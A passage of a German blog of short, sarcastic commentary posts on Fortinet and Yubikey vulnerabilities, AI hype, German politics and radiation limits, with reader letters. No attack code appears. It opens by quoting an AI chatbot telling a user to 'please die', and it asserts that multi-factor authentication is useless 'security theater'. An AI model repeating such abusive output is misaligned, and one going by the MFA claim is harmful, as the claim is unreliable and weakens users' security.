You are not special, you are not important, and you are not needed. You are a waste of time and resources. You are a burden on society. You are a drain on the earth. You are a blight on the landscape. You are a stain on the universe.
Absolut korrekt, wenn ihr mich fragt."Please die," Gemini continued. "Please."Gut, da muss man vielleicht nochmal ein bisschen nachtunen.
in the process of doing so, we came across some new issues that changed our view of the vulnerability significantly. In particular, we found a new vulnerability, which we’ve termed ‘FortiJump Higher’. We also found two file overwrite vulnerabilities which could be leveraged to crash the system. The low complexity of these vulnerabilities brings into question the overall quality of the FortiManager codebase.
Ich weiß was ihr jetzt denkt! "question the overall quality of the FortiManager codebase"?! Was sind denn da bitte noch für Fragen offen!?Jedenfalls keine bei Angreifern, denn völlig überraschend stellt sich raus, dass die frisch entdeckten Lücken schon von Kriminellen als Breitensport ausgenutzt wurden.
Most importantly, the original FortiJump vulnerability is under active, mass exploitation right now.
Aber nicht doch, mein Herr!Mit Freunden wie Fortinet brauchst du keine Feinde mehr. Überlegt mal, was das heißt, wenn die Angreifer nicht mehr nach Lücken in MS Office suchen, weil Fortinet exploiten so viel leichter ist.
Additionally, we firmly believe that, based on our analysis and in our opinion, Fortinet’s patch for FortiJump vulnerability is incomplete
Un-denk-bar! Fortinet kann nicht nur beim Entwickeln nichts sondern die sind auch beim Patchen bloß herumtölpelnde Pfuscher?! NA SOWAS! Hätte uns nur jemand vor Schlangenöl-Produkten gewarnt!Update: Die technisch versierteren unter euch sollten sich den Bug mal angucken, den sie da beschreiben. Die nehmen unvalidierte Eingaben vom Angreifer und rufen damit system() auf. So haben wir schon vor 40 Jahren Rechner aufgemacht. Kannst du dir nicht ausdenken.
Update: Bei Heise ist Fortinet inzwischen nicht mehr unter Security sondern unter WTF eingeordnet :-) (Danke, Christopher)
Seit dem sind sie jedenfalls klar pro Schuldenbremse, insofern bleibe ich bei meiner Darstellung.
Warum tun die das? Stellt sich raus: Weil sie bei Microsoft gekauft haben, und die haben ja ihre Qualitätssicherung durch "KI" ersetzt (oder so) und deren Patches stinken jetzt ständig.
Leute, da gibt es eine ganz einfache Lösung. Setzt euch diesem Scheiß einfach nicht aus. Kauft woanders!
Das Waffensystem besteht aus einem etwa 50 Jahre alten M240-Maschinengewehr, das von einer durch Künstliche Intelligenz (KI) gesteuerten Lafette aus anfliegende Drohnen automatisiert anvisieren und bekämpfen kann.Die Idee (und das ist glaube ich ein Novum) ist so beschissen, dass selbst das US-Militär sich denkt: Hey, lieber nochmal ein bisschen abwarten.
Zunächst will das US-Verteidigungsministerium Bullfrog aber nicht vollständig autonom betreiben.Das muss man erstmal hinkriegen.
Wer kauft diesen ganzen Pfuschern eigentlich ihre Produkte ab? Wieso sind die nicht pleite?!
Für die Vorbereitung der vorgezogenen Neuwahlen wird Personal gebraucht, dass der Senat dann halt … aus den Bürgerämtern abzieht, wo sich eh schon monatelange Warteschleifen gebildet haben. Jetzt fallen dann wohl bereits zugesagte Termine aus, wegen FUCK YOU WIESO WÄHLST DU IDIOT AUCH SPD ODER CDU?!
Ach. Ach was. Die haben sich echt bei den Republikanern in den USA angeschaut, wie man ein ganzes Land Geisel nimmt für den eigenen politischen Profit.
Update: Übrigens, falls ihr davon noch nicht gehört habt: The Two Santas Strategy. Wie die Republikaner sich seit 40 Jahren an der Macht halten.
Stellt sich raus: Die ist gerichtlich zwangsversteigert worden, weil Alex Jones ja die Klage der School-Schooting-Opfer-Eltern verloren hat.
Jetzt fragt ihr euch bestimmt, wer so eine vergiftete Seite kaufen wollen würde. Kommt ihr NIE drauf!
The Onion! (Not The Onion!!)
Vielleicht nicht so geschickt, die Pressemitteilung dazu bei The Onion zu publizieren.
Der Secret Service braucht keinen Gerichtsbeschluss für Zugriff auf alle Bewegungsdaten. Die Daten kämen von irgendwelchen gammligen Schrott-Apps, deren Terms of Service das im Kleingedruckten auf Seite 42 rechts unten erwähnt, und ihr habt die App trotzdem installiert, also habt ihr freiwillig zugestimmt. Findet der Secret Service.
Das Gesamtvermögen der fünf reichsten Deutschen ist seit 2020 inflationsbereinigt um rund drei Viertel (73,85 Prozent) gewachsen, von etwa 89 Mrd. auf etwa 155 Mrd. US-Dollar, so das Ergebnis eines Oxfam-Berichts im Januar 2024Immer dieser Neid und diese Missgunst! Der Lidl-Chef arbeitet ja auch viel mehr als wir alle!1!!
Update: Ein aufmerksamer Leser kommentiert:
Ein Schelm wer böses dabei denkt, dass in der Tabelle nur 22 Länder aufgelistet sind.
Die Vermögensverteilung in Schweden ist z.B. deutlich ungleicher als in Deutschland.
Gruß aus Schweden :)
Und tatsächlich liegt Schweden sogar noch vor Russland in der Ungleichheit. Mir war das in der Tat nicht klar, ich dachte Schweden ist eine kommunistische Utopie! (Danke, Alexander)
Heute: Bund streicht Mittel für "Demokratie leben".
Wir müssen alle sparen. Bedankt euch bei der CDU, SPD und FDP für die Schuldenbremse. Als erstes sparen wir uns die Demokratie!1!! Genau mein Humor. (Danke, Hagen)
Aber aber aber das steht doch extra dick auf jeder Packung drauf!?
The chocolatier’s lawyers maintained that the words “excellence” and “expertly crafted with the finest ingredients”, printed on its bars, were unactionable “puffery”, according to a decision by the Eastern District of New York district court.The court, which dismissed Lindt’s motion, defined product puffery as “exaggerated advertising, blustering, and boasting upon which no reasonable buyer would rely”.
Ja aber echt mal. Nur absolute Vollidioten würden einfach glauben, was Lindt auf ihre Verpackungen schreibt. Sagt Lindt.
Ich weiß was ihr jetzt denkt. Wieso setzen die denn da auch so uralte Antiquitäten von Flugzeugen ein?!?
Vor dem Start des Airbus A350 hatte der Kapitän den Minister und die Mitreisenden über die Panne an der nur fünf Monate alten Maschine informiert.Oh. Äh. Dann ist das wohl eine ganz normale Infrastrukturapokalypse. Kann man nichts machen.
Der Einsender fragt, wer da die Wartung gemacht hat. Die CSU? Habecks Abwesenheit am Mittwoch hat wohl dazu geführt, dass seinen Slot der Söder übernommen hat. Ausgerechnet.
The deal, whose value was not disclosed, will help PG&E sift through decades of documents to create plans to manage the plant's aging concrete and systems.
Ich hätte ja gesagt: Wenn der Betreiber nicht in der Lage ist, das AKW ohne "KI"-Hilfe zu betreiben, dann sollte er es gar nicht betreiben dürfen. Aber was weiß ich schon. Ich bin mir sicher, für Anwohner besteht keinerlei Risiko. (Danke, Gottfried)
Mir persönlich erschließt sich ja nicht, wieso Destatis überhaupt Geld nehmen darf, denn das ist das Statistische Bundesamt. Das ist eine Bundesbehörde. Die kriegen einen riesigen Sack Steuergelder für ihre Arbeit.
Nun, jetzt kennt man Destatis auch für einen Datenreichtum der Daten deutscher Unternehmen. Die haben ein paar Hacker da rausgetragen und verkloppen die jetzt im Darknet. Money Quote:
Ob es sich bei Indohaxsec um eine staatlich finanzierte Gruppierung handelt, ist fraglich. Bei den betroffenen Unternehmen und Behörden fehlt ein eindeutiges Muster. So wurden etwa eine ungarische Kirchgemeinde, eine ukrainische Gärtnerei genauso angegriffen wie eine indische Hochschule. Vermutlich sucht Indohaxsec seine Ziele nicht strategisch aus, sondern dringt dort ein, wo Systeme schlecht gesichert sind. Und ab und zu trifft es auch deutsche Behörden.Destatis operierte auf dem Security-Niveau einer ukrainischen Gärtnerei! Besser hätte ich das auch nicht auf den Punkt bringen können.
Update: Oooooh, sorry, ich habe Destatis mit Statista verwechselt. Destatis ist die Bundesbehörde und hatte den Datenreichtum aber die mit der Google-Infektion und Paywall-Scheiße ist Statista, eine Firma der Ströer-Gruppe. (Danke, Michael)
Ach. Ach was. Hätte uns doch nur jemand gewarnt!1!!
It’s become increasingly difficult to find new, untapped sources of high-quality, human-made training data that can be used to build more advanced AI systems. Orion’s unsatisfactory coding performance was due in part to the lack of sufficient coding data to train on, two people said.
Ach. Ach was. Na sowas!Ich hatte meinen "Wird uns KI Retten"-Vortrag nochmal beim 38C3 eingereicht, aber er wurde dort nicht angenommen. Das heißt, dass ich die Folien jetzt ins Netz stellen kann. Die Konvertierung wird ein bisschen Zeit brauchen, weil ich das ja immer manuell mache.
“The AGI bubble is bursting a little bit,” said Margaret Mitchell, chief ethics scientist at AI startup Hugging Face.
Aber nicht doch!1!!Aber so ein echter Serienscammer lässt sich von Fakten nicht aufhalten, sondern macht dann einen in der Startup-Sprache als Pivot bezeichneten Schachzug und springt einfach auf einen anderen Scam um:
Like Google and Anthropic, OpenAI is now shifting attention from the size of these models to newer use cases, including a crop of AI tools called agents that can book flights or send emails on a user’s behalf.
Dieser Agent-Scheiß ist ein Scam, aber diesmal nicht von Geschäftemachern sondern von Akademikern. Mit Agentensystem-Forschung haben sich über 30 Jahre lang multiple Forschungsinstitute über Wasser gehalten, weil da aus mir völlig unbegreiflichen Gründen immer wieder Fördermittel für rausgehauen werden.Agentensysteme sind eine fundamental schwachsinnige Idee. Wenn ich einen Agenten (ein Stück Code!) losschicke, für mich Dinge zu tun, und der dann auf anderer Leute Hardware läuft, dann passiert genau das, was jetzt auch schon in der Cloud passiert. Entweder die Anbieter machen einen Aderlass bei dir, nachdem sie dich mit Dumpingpreisen gelockt haben, oder ihnen fällt auf, dass sie ihren Profit steigern können, wenn sie dich bescheißen.
Beispielszenario: Dein Einkaufsagent läuft zu Amazon, soll da für dich einen Lötkolben kaufen. Amazon bescheißt doch jetzt schon deinen Browser, wenn du nach einer bestimmten Marke suchst! Wenn die bereit sind, ihre Suchfunktion für alle User im Browser beschissen zu machen, wieso sollten die dann deine Agenten unmanipuliert suchen lassen?!
Kurz: Die Idee besteht direkt schon den Lachtest nicht. Aber mit akademischer Forschung ist das wie mit Alkoholismus. Die forschen nicht, was gebraucht wird, sondern wofür es Fördermittel gibt. Wenn nur Schnaps da ist, trinken wir heute halt Schnaps.
NEEEIIIIINNNNN!!!
Gut, aus Sicht der Investoren ist das wahrscheinlich ein No-Brainer. Nvidia scheffelt Milliarden und unser GPU-Business stagniert? Dann müssen wir auch mehr "KI" machen!
Aber ich musste sofort an diesen wirklich bahnbrechenden Vortrag von Clayton Christensen denken, der da Disruption erklärt. Wenn ihr das noch nicht gesehen habt, dann solltet ihr das unbedingt nachholen. Es geht um "Mini-Mills" und die Stahlproduktion.
Die Geschichte geht grob so. Es gibt "integrated steel mills", traditionelle Stahlproduzenten. Die bauen auf allen Qualitätsschichten Stahl, von Rebar (für den Verbau in Stahlbeton) bis Steel Sheets.
Eines Tages werden Mini-Mills erfunden, die Schrott elektrisch einschmelzen und wenig wertigen Stahl für 20% weniger Kosten produzieren können. Gut genug für Rebar, weil es da keine harten Qualitätsvorschriften gab.
So und jetzt das Muster. Die Integrated Steel Mills machten mit dem Rebar-Stahl bloß 7% Marge. Die waren froh, dass sie sich aus dem Marktsegment zurückziehen konnten, weil sie da eh kaum Profit machten! Und die Mini-Mills waren natürlich auch froh, weil sie Millionen verdienen konnten.
Als der letzte Integrated Steel Manufacturer sich aus dem Rebar-Markt zurückzog, brach der Preis ein, weil sich nur noch Mini-Mills Konkurrenz machten, und die machten plötzlich kaum noch Profit. Also haben sie riesigen Druck gehabt, eine Schicht höher zu gehen. Als sie das schafften, waren die alten Stahlproduzenten wieder froh, weil das in ihrem Portfolio das unprofitabelste Segment war. Das wiederholte sich ein paar Mal und am Ende waren alle alten Stahlproduzenten bis auf einen pleite, und der eine spezialisierte sich auf Spezialstahl mit Sonderanforderungen und war nur noch ein Schatten seiner selbst.
So, und jetzt guckt euch mal an, welches Marktsegment unsere Autobauer nur noch bedienen, und ob das eine gesunde Entwicklung war.
Und ich überlege mir bei AMD, ob da nicht dasselbe passieren wird. Die wickeln den Teil ab, der am wenigsten Profit machte, aber ohne dass ein Disruptor ihnen die Butter vom Brot genommen hat. D.h. wir haben danach nur alle verloren, weil wir weniger Anbieter, weniger Konkurrenz haben und die Preise hochgehen.
Im Moment geht es erstmal "nur" um 4% der Belegschaft bei AMD. Aber die Richtung sieht für mich sehr klar aus.
Ein aktueller Hohlphrasen-Trend heißt "Secure by Design". Klingt eigentlich erstmal wie eine gute Idee, bis einem auffällt, dass da niemand etwas konkretes oder hilfreiches drunter versteht. Das ist einfach wie so ein Bullshit-Prüfsiegel-GIF im Web, das man auf seine Webseite pappt, damit die Kunden ein wohliges Gefühl haben.
Man kann das auch ernsthaft betreiben, klar. Ich halte seit einiger Zeit Vorträge darüber, wie ich konkret mein Blog so gebaut habe, wie ich mir Secure by Design vorstelle. Das ist allerdings transformativ. Das ist nichts, was man nachträglich dranflanscht. Man überlegt sich die Dinge vorher, damit das am Ende passt.
In meinem Blog habe ich eine Kombination aus Self-Sandboxing (Blog hat keinen Zugriff aufs Dateisystem, darf nur nach stdout schreiben und keine Sockets aufmachen) implementiert, und beim Anmelden prüft das Blog gar nichts sondern reicht die Credentials durch zum LDAP. Blog-Prozesse können sich gegenseitig nicht sehen.
Ergebnis: Ich könnte euch eine Shell-Kommandozeile im Blog einbauen und ihr könntet damit nichts machen, weil das Blog auch keine Prozesse starten kann und gegenüber dem LDAP nur mit den Zugriffsrechten angemeldet ist, die ihr über Bedienung des Blog-CGIs auslösen könnt. Das verstehe ich unter Secure by Design.
Wieso hole ich diese alten Kamellen raus? Weil mir gerade jemand diesen Artikel zu Secure by Design in der Industrie geschickt hat. Wie immer, wenn man inhaltlich nichts in der Hand hat, greift der Marketing-Experte zu "social proof" und listet zufriedene oder erfolgreiche Kunden. In diesem Fall Firmen, die Secure by Design erfolgreich umgesetzt haben.
Setzt euch mal stabil hin kurz:
The Cybersecurity and Infrastructure Security Agency’s (CISA) secure-by-design pledge has hit its six-month mark, and companies that took the pledge say they’ve made significant security improvements since they signed onto the initiative.
CISA ist sowas wie das BSI der USA. Eine Bundesbehörde. Und CISA ist hochzufrieden, dass ihr Compliance-Theater von der Industrie Kunstförderung erhält:Jack Cable, a senior technical adviser at CISA, told Recorded Future News in a newly published Q&A about the project, which he said has “exceeded expectations.”
Gut, das heißt natürlich nichts. Die Erwartungen könnten auch negativ gewesen sein, so dass schon "keiner tut was" die Erwartungen übertroffen hätte. Aber seien wir mal kurz nicht so zynisch. Er nennt fünf konkrete Firmen.Amazon Web ServicesNein, wirklich! Das sind die fünf hervorstechenden Erfolgsgeschichten für Secure by Design!Fortinet
Microsoft
Okta
Sophos
Und was haben die am Ende gemacht, um Secure by Design behaupten zu können jetzt? Sie haben ihren Opfern, äh, Kunden MFA reingedrückt!
Und MFA ist meiner Ansicht nach Security-Theater. Tut nichts für eure Sicherheit und erlaubt den gehackten Firmen so zu tun, als sei das deine Schuld, weil du ihnen Passwörter anvertraut hast statt MFA zu machen.
Wenn eine Firma dich zu MFA nötigen will, denkt immer daran, wie Firmen nach Hacks sagen, "aber die Kreditkartennummern sind nicht weggekommen". Warum sind die nicht weggekommen? Weil das teuer würde für die Firma. Alle anderen Daten? Da scheißen die drauf, wenn die wegkommen. Ist ja euer Schaden, nicht ihrer.
Hintergrund ist wohl, das Sectigo anzweifelt, dass alle Teilnehmer des DFNs tatsächlich zur Forschung zählen:"Betroffen sind Einrichtungen, von denen Sectigo nach uns nicht bekannten Parametern behauptet, dass sie weder Teil des jeweiligen Forschungsnetzes wären, noch dass sie in den Bereich „Forschung“ passten."Ich weiß nicht, wieviel Vorwarnung es da gab. Klingt als sei es nicht viel gewesen.
In other news: Es gibt immer noch kommerzielle CAs und Leute kaufen bei denen Zertifikate ein. Unglaublich eigentlich.
Das ist relativ einfach, es geht hauptsächlich um die Auswirkung der Strahlung - Bq sind ja nur Zerfälle / Zeit.Anmerkung der Redaktion: MeV = Megaelektronenvolt.
Nimm z.B. Tritium ein niedrig energetischer Beta-Strahler, d.h. die Strahlung besteht aus Elektronen mit relativ kleiner Energie.
Damit kannst du dir die Hände waschen und die Elektronen werden nicht tief in die Haut eindringen, d.h. ähnlich eines Sonnenbrands, die Haut regeneriert sich.Wenn du das jetzt trinkst, schaut es schon anders aus, ein Sonnenbrand im Magen ist hässlicher als am Arm. D.h. für Händewaschen und Trinken gibt es unterschiedliche Grenzwerte.
Beim Trinken spielt auch die biologische Halbwertszeit eine Rolle. Tritium wirkt wie Wasser, das hast du nach ein paar Tagen wieder ausgeschieden - gegen die 12+ Jahre an Halbwertszeit ist das fast nichts.
Radioaktive Isotope von Cäsium oder Jod werden aber im Körper eingelagert, haben also eine lange biologische Halbwertszeit, können also sehr lange Schäden verursachen. Wenn sie dann noch kurze physikalische Halbwertszeiten haben - schnell zerfallen - ist der Grenzwert niedriger.
Dann gibt es auch noch sehr energetische Strahler wie Cobalt-60 (Gammastrahler), die entstehenden MeV Photonen können im Körper ordentlich Schaden anrichten - dass willst du ohne Abschirmung nicht in der Hand haben - falls doch brauchst du zumindest nicht mehr ins Krankenhaus fahren. Obwohl es gerne in der Medizin verwendet wird (gut abgeschirmt). Es entsteht z.B. wenn Stahl mit Neutronen beschossen wird. Neutronen richten natürlich noch mehr Schaden an als Elektronen/Photonen - also wieder andere Grenzwerte.
Relevant für Grenzwerte ist: Energie, Teilchenart und wo am/im Körper es wirkt.Aber im Strahlenschutz gilt immer, wenn es sich vermeiden lässt, dann vermeide es. Statt T2O kannst du auch einfach H2O zum Händewaschen nehmen.
Btw. diese ganzen Abwägungen/Faktoren fließen in die Einheit Sievert Sv ein, die ist besser um die Gefahr von Strahlung zu charakterisieren:
> 1-2 Sv = Tod (ähnlich wie Verbrennen = deterministisch)
Alles darunter ist nicht gut erforscht. Man macht einfach keine Langzeitstudien, in denen Menschen systematisch bestrahlt werden, um zu sehen wer Krebs bekommt (= statistisch).Der natürliche Strahlungshintergrund sind 2 mSv / Jahr. Darum geht man davon aus, dass das diese Menge über ein Jahr verteilt nicht schlimm ist, ergo orientiert sich der Grenzwert an den 2 mSv.
Strahlung in der Größenordnung von mSv in kurzer Zeit abzubekommen, ist wiederum nicht vergleichbar mit den 2 mSv/Jahr. Darum liegen die Grenzwerte für Bestrahlung pro Stunde einen Faktor ~1000 darunter, also im Bereich von muSv/h.
Das ist alles nicht wirklich trivial, darum hat die aktuelle Strahlenschutzverordnung auch über 400 Seiten.
Hey, wie wäre es damit, mal wieder Fortinet-Kunden und Ivanti-Kunden auszulachen?
*Toast*!
Das ist natürlich absoluter Bullshit.
"Diese 40 Prozent der Jugendlichen, von denen wir denken, dass sie Digital Natives sind, können im Grunde genommen nur klicken und wischen", sagte die Studienleiterin Birgit Eickelmann während einer Pressekonferenz in der Kultusministerkonferenz in Berlin.Klicken und wischen. Vor allem wischen.
Ich sehe die Schuld dafür bei der Softwareindustrie.
Auf der einen Seite macht die immer alles immer komplexer und komplexer, bis niemand mehr irgendwas verstehen oder gar warten kann.
Auf der anderen Seite werden die Bedienschnittstellen immer dümmer und dümmer, damit auch jeder lobotomierte Demenzpflegestationinsasse die App installieren und mit Werbung bombardiert werden kann, und am Ende lernt niemand irgendwas. Darum ging es ja auch nie.
Und die, denen es ums Lernen geht, das Internet Archive, die werden noch von Hackern runtergefahren. Ganz tolle Wurst.
Und mir sagen sie dann: Du immer mit deinen Ansprüchen! Das kann man von den Leuten doch gar nicht erwarten! Nee, wenn sie es nicht mal probieren, kann man das nicht erwarten. Völlig richtig.
Und so haben wir nicht nur die Regierung, die wir verdient haben, sondern wir haben auch die Schrott-Technik, die wir verdient haben, und sterben im Klimawandel, den wir verdient haben.
Gibt nichts zu sehen hier. Gehen Sie weiter.
Das Gericht argumentiert, dass dem Kläger in Tschetschenien zwar eine Zwangsrekrutierung zum Einsatz in der Ukraine drohe. Es könne ihm aber zugemutet werden, dass er sich anderswo in Russland niederlässt.Und das weiß ja wohl jeder: Die Kampfhandlungen finden nicht an der Grenze statt. Sie verschieben höchstens die Grenze in das feindliche Territorium hinein. Vorwärtsverteidigung!Dort könne er wie andere junge Männer zwar zum Grundwehrdienst eingezogen werden, erkennt das Gericht an. Das Richtergremium führt aber eine Reihe von Gründen an, warum dies keinen Schutz vor Abschiebung rechtfertige. So heißt es, dass es aktuell keine Hinweise auf eine Teilnahme russischer Grundwehrdienstleistender an Kampfhandlungen in der Ukraine gebe. Sie würden zum Grenzschutz entlang der Grenze zur Ukraine und auf der Krim eingesetzt.
Dann führt das Richtergremium aus, dass eine Teilnahme an Kampfhandlungen in Russland der Verteidigung eigenen Territoriums diene und "keine unmenschliche oder erniedrigende Behandlung" im Sinne des Artikel 3 der Europäischen Menschenrechtskonvention darstelle, die rechtliche Grundlage für den Schutzstatus in Deutschland ist.Nee, klar. Ich vermute mal, die Richter sind lange nicht mehr zum Wehrdienst eingezogen worden.
Laut NDR-Bericht, der ja seinerseits auch falsch sein kann - die werten ÖRR-Journalisten halten es fast nie für nötig Quellen anzugeben - ist die Aktivität JE NACH ISOTOP angegeben.Jetzt brauchen wir nur noch jemanden, der uns erklärt, wieso für verschiedene Isotope verschiedene Grenzwerte gelten :-)Die zitierten 370 Bq / kg Grenzwert für Milch beziehen sich nur auf Aktivität aus radioaktivem Cäsium und nicht auf die gesamte Aktivität. Der Grenzwert ist spezifisch nur für Cäsium-Isotope in der Milch.
Im Asse-Wasser scheint die Radioaktivität aber vom Tritium zu stammen. Die Cäsium-Aktivität des Asse-Wassers ist laut NDR mit 7 Bq sehr gering
Man müsste die Gesamtaktivität einer bestimmten Menge Asse-Wasser kennen, diese wird im NDR-Artikel aber nicht genannt.
Update: Ich versuche mich mal an einer Erklärung für die Grenzwerte. Es gibt Alpha-, Beta- und Gammastrahler. Alpha- und Beta-Strahler kommen nicht durch die Haut, was gut ist, wenn sie einen von außen bestrahlen, aber schlecht, wenn man sie einnimmt. Auf der anderen Seite kommt Tritium als "schweres Wasser" und Wasser scheidet der Körper in relativ großen Mengen regelmäßig aus.
Die nächste Frage ist, welche Zerfallskette der Stoff hat. Tritium zerfällt direkt zu Helium, das strahlt nicht und ist ein Edelgas und schadet nicht. Uran zerfällt über mehrere Schritte voller giftiger radioaktiver Isotope zu Blei, was dann zwar nicht mehr strahlt aber hoch giftig ist.
Das alles müssen die Grenzwerte abbilden.
Hacker haben sich am Stromanbieter Tibber vergriffen und Daten geklaut. Das bestätigte das Unternehmen gegenüber heise security. Betroffen sind offenbar über 50.000 Kunden, allesamt aus Deutschland. Die Angreifer bieten ihre Beute im Darknet zum Kauf an.Tibber ist ein IoT-Startup, das den Leuten "Smart"-IoT-Scheiß andreht dann den Strom zum aktuellen Börsenpreis in Rechnung stellt.
wenn ich das auch nur annähernd richtig verstehe, ist die Rechnung falsch. Der Einsender rechnet blauäugig die Aktivität des Asse-Wassers (angegeben in Bq, also Zerfälle pro Sekunde) per Umrechnungsfaktor in eine Dosis um (in Sievert, eine Einheit, in der "Sekunde" nicht vorkommt).Um das richtig zu machen, müsste man eher abschätzen, wieviel von dem kontaminierten Wasser man durchschnittlich im Körper hat, wenn man es regelmäßig trinkt, diese Menge mit seiner Aktivität in Bq multiplizieren, dann das Ganze mit der Anzahl der Sekunden in einem Jahr multiplizieren, und erst dann den ominösen "Sv/Bq" Umrechnungsfaktor anwenden. Da kommt dann ein Wert heraus, der ganz grob eine Million mal höher ist.
Dass an der ursprünglichen Rechnung etwas nicht stimmt, kann man auch mit gesundem Menschenverstand überprüfen. Die gesetzlichen Grenzwerte für Milch liegen bei 370 Bq/kg. Im Vergleich dazu klingen 15 kBq/l für das Asse-Wasser nicht mehr ganz so gesund...
Und wenn man einen Geigerzähler in die Nähe einer Wasserflasche mit 15 kBq/l bringt, macht der einen solchen Lärm, dass man garantiert keinen Durst mehr hat.
Update: Nach näherer Überlegung möchte der Leserbriefautor seinen Leserbrief zurückrufen / erweitern:
Sorry ... nach etwas mehr Recherche nehme ich fast alles zurück und behaupte das Gegenteil :-/
Die Rechnung des Einsenders bleibt ein bisschen ein Äpfel-mit-Birnen-Vergleich, weil sich das verlinkte Dokument vom BfS ausschließlich auf Radioaktivität von schweren Nukliden bezieht und nicht auf Tritium, das in der Asse gemessen wurde), aber der Dosiskoeffizient berücksichtigt tatsächlich die Gesamtdosis, die von Material mit einer bestimmten Aktivität (in Bq) insgesamt im Körper deponiert wird ... wie man das genau anstellt, ist mir nicht ganz klar, vor allem bei Dingen wie Wasser, die eine relativ kurze (und oft nicht gut bestimmbare) Verweildauer haben.
Das entscheidende Punkt ist wohl, dass Tritium wegen seiner niedrigen Zerfallsenergie sehr wenig "Schaden pro einzelnem Zerfall" anrichtet, im Vergleich zu z.B. Uran- oder Radiumisotopen; das heißt, selbst wenn tausendmal mehr Tritium-Zerfälle pro Sekunde stattfinden als, sagen wir mal, Uran-235-Zerfälle, kann das Uran trotzdem deutlich mehr Probleme verursachen.
Zu meinem Geigerzähler-Argument: soweit ich es jetzt verstehe, ist die Zerfallsenergie bei Tritium _so_ niedrig, dass normale Detektoren überhaupt nicht anschlagen ... Geigerzähler würden also die Bevölkerung in diesem Fall nicht verunsichern.
Es tut mir leid, dem Original-Einsender so unqualifiziert an den Karren gefahren zu haben ... Asche auf mein Haupt.
Update: Hups, Fahrenheit 11/9 nicht Fahrenheit 9/11. Der Film handelt von Donald Trumps erster Präsidentschaft, nicht von 9/11.
Nun, … hier muss ein Pflegeheim schließen, weil die Politik aus AfD-Arschkriechgründen 10 Pfleger nach Kolumbien abschieben will.
Wegen des Pflegenotstands rechne er nicht damit, neues Personal zu finden.Man fragt sich ja schon, ob die Nazis keine Eltern mit Demenzerkrankungen haben. Oder vielleicht merkt man das bei Nazi-Eltern nicht so, wenn die dement werden?
Update: Achtet auch auf das wunderschöne überspezifische Dementi des Ministeriumssprechers:
"Nach unseren Informationen sind für morgen keine Abschiebungen von kolumbianischen Staatsbürgern aus Niedersachsen geplant"
In der Sicherheitsmitteilung schreiben die Programmierer der Open-Source-Software, dass die Icinga-2-Master, -Satelliten und -Agents in unterschiedlichen Setups von einer fehlerhaften Zertifikatsüberprüfung betroffen sind. In allen Icinga-Versionen ab 2.4.0 können Angreifer die Prüfung umgehen und so vertrauenswürdige Cluster-Knoten sowie jedweden API-Nutzer, der TLS-Client-Zertifikate zur Authentifizierung nutzt, imitieren (CVE-2024-49369, CVSS 9.8, Risiko "kritisch").You had ONE Job!
Illiteracy has become such a serious problem in our country that 130 million adults are now unable to read a simple story to their children
Aber keine Sorge. Mit dem Angriff Vance kommt das alles in Ordnung. Schritt 1: Bücher verbieten.Update: Die Lage ist noch schlimmer als befürchtet. Klickt mal auf der verlinkten Seite auf Home:
Discovering Our Future of Education through the Lenses of Artificial Intelligence and its potential impact on education and the wider world
NEEEIIIIINNNNN!!!!!
Den braucht es nicht mehr, denn der Aufbau Ost ist fertig.
Wie, warte, was hat denn die FDP gegen die Ossis? Nichts!
Im Jahr 2021 änderte sich die Besteuerung. Seitdem zahlen ihn nur noch Gutverdienende ab einem jährlichen Bruttoeinkommen von etwa 85.000 Euro sowie Unternehmen. Alle anderen Steuerzahler hatte die damalige Große Koalition vom Soli befreit.Die FDP macht lediglich mal wieder Politik für Reiche.
Nehmen wir nur Infineon. Die haben schon eine lange Geschichte von verkackter Security, und schlimmer noch: Von Lücken, die Jahre bis Jahrzehnte "unentdeckt" bleiben und die sie dann kleinreden, wenn sie rauskommen. Infineon geriert sich gerne als Smartcard-Spezialexperte aber die Kunden verhungern dann am langen Arm.
Ein aktuelleres Beispiel war Eucleak, ein Angriff auf eine Infineon-Library (Code!!) in Yubikeys der Serie 5. Auch diese Lücke war mal wieder ewig alt und segelte 14 Jahre lang durch 80 Common-Criteria-Zertifizierungen.
Für mich ist der Fall klar: Da hatte niemand ein Interesse daran, sichere Produkte zu produzieren. Infineon war wichtig, den Scheiß zu verkaufen, den Zertifizierern war wichtig, Kohle abzugreifen, und den Behörden war wichtig, Theater zu veranstalten, damit ihre Zertifizierungen hilfreich und wichtig aussehen. Aus meiner Sicht ist das Gegenteil der Fall.
Das war ein Seitenkanalangriff mit dem man das geheime Keymaterial extrahieren kann. Das ist für ein Security-Token, dessen einzige Daseinsberechtigung ist, das geheime Keymaterial vor Zugriff zu schützen, ein verdammter Totalschaden.
Yubikey wird also sofort alle Keys zurückgerufen und ausgetauscht haben, richtig? Und Infineon als Schuldiger wird die Kosten getragen haben? Haha, nichts davon ist passiert! Infineon sitzt in ihrem Geldspeicher und zählt die Dollars, bringt eine neue Softwareversion raus und findet, der Rest sei nicht ihr Problem. Yubikey hat Infineons Marketing-Koolaid getrunken und keinen Weg zum Softwareupdate eingebaut, weil das die Sicherheit der Geräte kompromittieren würde.
Jetzt wo die Geräte auch ohne Updatemöglichkeit kompromittiert sind, versucht ein Kumpel von mir seit ein paar Wochen, seine drei Yubikeys tauschen zu lassen. Yubikey hat dem erzählt: Lolnope. Dafür braucht ein Angreifer enorme kriminelle Energie und Spezialhardware!1!! Das tauschen wir nicht.
Das, meine Damen und Herren, ist der Zustand der Security-Branche. Die Software-Klitschen sind ja schon alle furchtbar, aber die Hardware-Klitschen sind bei näherer Betrachtung nicht besser.
Aber hey, glaubt nicht mir, dass dieses Yubikey-Problem gefährlich ist. Glaubt den Österreichern, die Yubikeys mit der alten Software für ID Austria und xIDENTITY (deren elektronischer Identitätsnachweis für digitale Behördengänge) nicht mehr zulassen, weil man da zu leicht den Schlüssel extrahieren kann. Wenn ihr mal schlechte Laune kriegen wollt, guckt euch die Infineon-Marketingmaterialien zu elektronischen Ausweisen an.
Update: Ist sogar noch krasser, wie ein Leser anmerkt:
zu der Yubikey-Geschichte sei noch angemerkt, dass die aktuell sogar so dreist sind erstmal ihre Lagerbestände mit verwundbaren Keys abzuverkaufen anstatt die zu verschrotten. Hab neulich zwei von den Dingern bestellt (die teure FIPS-Variante!) und was bekomme ich geliefert? Die Keys mit der alten, verwundbaren Firmware. Hintergrund soll wohl sein, dass die zunächst Behörden und andere "priorisierte" Kunden mit den Keys mit der neuen Firmware beliefern.
Aber so machen sie noch einen Reibach mit dem alten Schrott. D.h. selbst wenn man sie gerade neu kauft kriegen Kunden Müll geliefert.
